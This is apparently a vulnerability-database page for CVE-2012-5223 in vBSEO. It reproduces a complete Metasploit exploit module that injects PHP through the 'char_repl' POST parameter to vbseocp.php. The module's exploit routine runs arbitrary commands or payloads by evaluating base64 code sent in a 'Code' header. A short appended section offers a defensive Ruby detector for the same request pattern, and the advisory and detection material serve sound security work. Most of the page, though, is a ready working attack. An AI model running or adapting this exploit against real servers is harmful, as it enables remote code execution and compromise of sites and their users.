vBSEO proc_deutf() Remote PHP Code Injection

30 Jan 2012 22:15:27 | Reported by EgiX <[email protected]> | Type: metasploit | www.rapid7.com

vBSEO proc_deutf() Remote PHP Code Injection in vBSEO versions 3.6.0 and earlier.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2012-5223 | 1 Oct 2012 20:55 | attackerkb
Circl | CVE-2012-5223 | 27 Jan 2012 00:00 | circl
Check Point Advisories | vBSEO Remote PHP Code Injection (CVE-2012-5223) | 6 Jun 2013 00:00 | checkpoint_advisories
CVE | CVE-2012-5223 | 1 Oct 2012 20:00 | cve
Cvelist | CVE-2012-5223 | 1 Oct 2012 20:00 | cvelist
Dsquare | vBSEO 3.6.0 RCE | 31 Jan 2012 00:00 | dsquare
NVD | CVE-2012-5223 | 1 Oct 2012 20:55 | nvd
OpenVAS | vBSEO 'proc_deutf()' Remote Code Execution Vulnerability | 31 Jan 2012 00:00 | openvas
OpenVAS | vBSEO 'proc_deutf()' RCE Vulnerability - Active Check | 31 Jan 2012 00:00 | openvas
Prion | Code injection | 1 Oct 2012 20:55 | prion

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBSEO proc_deutf() Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in the 'proc_deutf()' function
        defined in /includes/functions_vbseocp_abstract.php for vBSEO versions
        3.6.0 and earlier. User input passed through 'char_repl' POST parameter
        isn't properly sanitized before being used in a call to preg_replace()
        function which uses the 'e' modifier. This can be exploited to inject
        and execute arbitrary code leveraging the PHP's complex curly syntax.
      },
      'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5223'],
          ['OSVDB', '78508'],
          ['BID', '51647'],
          ['EDB', '18424']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 8190,
          'Keys'        => ['php'],
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2012-01-23',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
        OptString.new('CMD', [false, "Command to execute"])
      ])
  end

  def check
    flag = rand_text_alpha(rand(10)+10)
    data = "char_repl='{${print(#{flag})}}'=>"

    uri = normalize_uri(datastore['URI'], 'vbseocp.php')

    response = send_request_cgi({
      'method' => "POST",
      'uri'    => uri,
      'data'   => data
    })

    if response.code == 200 and response.body =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['CMD']
      p = "passthru(\"%s\");" % datastore['CMD']
      p = Rex::Text.encode_base64(p)
    else
      p = Rex::Text.encode_base64(payload.encoded)
    end

    data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"

    uri = normalize_uri(datastore['URI'], 'vbseocp.php')

    response = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'data' => data,
      'headers' => { 'Code' => p }
    })

    vprint_status("Server replied with #{response ? response.code : "nothing"}")
  end
end
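
For defenders, the request shape described in the module (a POST to vbseocp.php whose 'char_repl' parameter carries PHP complex curly syntax) can be matched in a WAF hook or log pipeline. The following is an added example, not part of the Metasploit module or of vBSEO; the request hash shape, the benign 'char_repl' value and all sample requests are constructed assumptions.

```ruby
require 'uri'

# PHP variable-parsing openers used by "complex curly" syntax: {$ and ${
CURLY_SYNTAX = /\{\$|\$\{/

# Percent-decode up to max_rounds times so single- and double-encoded
# input is inspected in clear text. Malformed escapes stop the decoding.
def fully_decode(value, max_rounds = 3)
  max_rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value
end

# request: { method:, path:, body: } is a hypothetical shape, e.g. from a WAF hook.
def suspicious_char_repl?(request)
  return false unless request[:method].to_s.casecmp?('POST')
  script = File.basename(request[:path].to_s.split('?').first.to_s)
  return false unless script.casecmp?('vbseocp.php')

  request[:body].to_s.split('&').any? do |pair|
    key, value = pair.split('=', 2)
    # .b compares raw bytes, so invalid UTF-8 in the value cannot break matching
    fully_decode(key.to_s) == 'char_repl' &&
      fully_decode(value.to_s).b.match?(CURLY_SYNTAX)
  end
end

# Constructed sample requests (not captured traffic).
SAMPLES = [
  { method: 'POST', path: '/vb/vbseocp.php', body: "char_repl='{${print(AbCdEfGhIjKl)}}'=>" },
  { method: 'POST', path: '/vb/vbseocp.php', body: 'char_repl=%27%7B%24%7Bprint%28x%29%7D%7D%27%3D%3E' },
  { method: 'POST', path: '/vb/vbseocp.php', body: 'char_repl=%2527%257B%2524%257Bprint%2528x%2529%257D%257D' },
  { method: 'POST', path: '/vb/vbseocp.php', body: "char_repl='%C3%A4'=>'ae'" }, # assumed benign form
  { method: 'GET',  path: '/vb/index.php',   body: '' }
].freeze

SAMPLES.each do |r|
  puts "#{suspicious_char_repl?(r) ? 'ALERT' : 'ok   '} #{r[:method]} #{r[:path]}"
end
```

The check keys on the parameter content rather than on the 'Code' request header, since the header name is arbitrary and the curly syntax in 'char_repl' is what reaches preg_replace().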

02 Oct 2020 20:00 (Current)
Vulners AI Score: 7.8 (High risk)
CVSS 2: 7.5
EPSS: 0.79642